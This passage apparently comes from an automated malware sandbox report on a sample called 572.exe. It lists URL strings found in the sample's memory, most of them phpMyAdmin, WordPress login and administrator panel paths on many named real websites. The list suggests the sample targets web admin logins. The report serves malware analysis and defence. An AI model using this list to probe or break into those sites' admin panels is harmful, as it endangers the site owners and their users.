                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://money-farm.cc/administrator/95
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://money-farm.cc/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://money-farm.cc/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/PhpMyAdmin/);
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/PhpMyAdmin/K
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/phpMyAdmin/S
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/phpmyadmin/o
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/wp-admin/hp/index.phpvx
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/wp-login.php%
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/wp-login.php/index.phpmx
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://multiideas.com/wp-login.phpo
                Source: 572.exe, 00000009.00000003.4427379374.00000000391DC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mw.redsa.net/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E7CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mw.redsa.net/administrator/.hoteles.com21.com.arIm
                Source: 572.exe, 00000009.00000003.4427379374.00000000391DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mw.redsa.net/administrator/g
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/PhpMyAdmin/;
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/pma/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://naukrigulf.com/wp-login.php/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/administrator/;
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/phpMyAdmin/4-
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/phpmyadmin//20
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/wp-admin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/wp-login.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netcsomagom.dpd.hu/wp-login.phpcom
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netizion.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ngoalongvn.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ngoalongvn.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ngoalongvn.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/PhpMyAdmin/:2-
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/PhpMyAdmin/:80
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/PhpMyAdmin/nistrator/index.php
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/phpMyAdmin/222
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/phpmyadmin/22X2
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/wp-admin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/wp-admin/hp/index.phpOu
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/wp-login.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nossoplayer.me/wp-login.php/index.phpZu
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nuevopacto.runacode.com/administrator/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nuevopacto.runacode.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com
                Source: 572.exe, 00000009.00000003.4163206048.0000000040186000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304582370.00000000404EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: 572.exe, 00000009.00000003.4196885790.0000000047B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.commov?
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
                Source: explorer.exe, 00000002.00000000.2124664252.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                Source: 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                Source: explorer.exe, 00000002.00000000.2124664252.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: 572.exe, 00000009.00000003.4003323359.00000000390E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com/5.0
                Source: 572.exe, 00000009.00000003.4390567048.00000000391EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304582370.00000000404EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0#
                Source: 572.exe, 00000009.00000003.4163206048.0000000040186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0)
                Source: 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0/
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com5.0
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.comS
                Source: 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.comdows
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/phpMyAdmin/B
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/phpmyadmin/T
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/phpmyadmin/o
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://oferta.senasofiaplus.edu.co/pma/
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4118642679.000000004047C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
                Source: 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns/fb/zoomvideocall#
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opsu.terna.net/administrator/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opsu.terna.net/administrator/index.phpy
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opsu.terna.net/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opsu.terna.net/phpmyadmin/$
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opsu.terna.net/wp-login.php
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opsu.terna.net/wp-login.phpl5c
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opsu.terna.net/wp-login.phpn.php?
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ov.edesur.com.do/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ov.edesur.com.do/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ov.edesur.com.do/administrator/in.microsoftonline.com
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ov.edesur.com.do/administrator/p3i
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/administrator/0
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/wp-login.php/index.php7d
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/wp-login.php/index.php9d
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pan.baidu.com/wp-login.phpator/index.php6$s
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://phonandroid.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4003323359.00000000390E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://poligrafosecuador.com/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://poligrafosecuador.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://poligrafosecuador.com/administrator/index.phps
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://poligrafosecuador.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4307098588.00000000061FA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/administrator/index.php.php
                Source: 572.exe, 00000009.00000003.4307098588.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/administrator/index.phpH
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/administrator/index.php~
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/phpMyAdmin/.br:110~
                Source: 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/phpMyAdmin/U
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pt.secure.imvu.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/administrator/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/administrator/index.php587i
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/i
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/phpmyadmin/in/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/phpmyadmin/index.php~
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/pma/a/Gx
                Source: 572.exe, 00000009.00000003.4390567048.00000000391EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E73A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406A8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4463057124.000000004E73B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.00000000390D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qingting.baidu.com/index?pid=19
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/
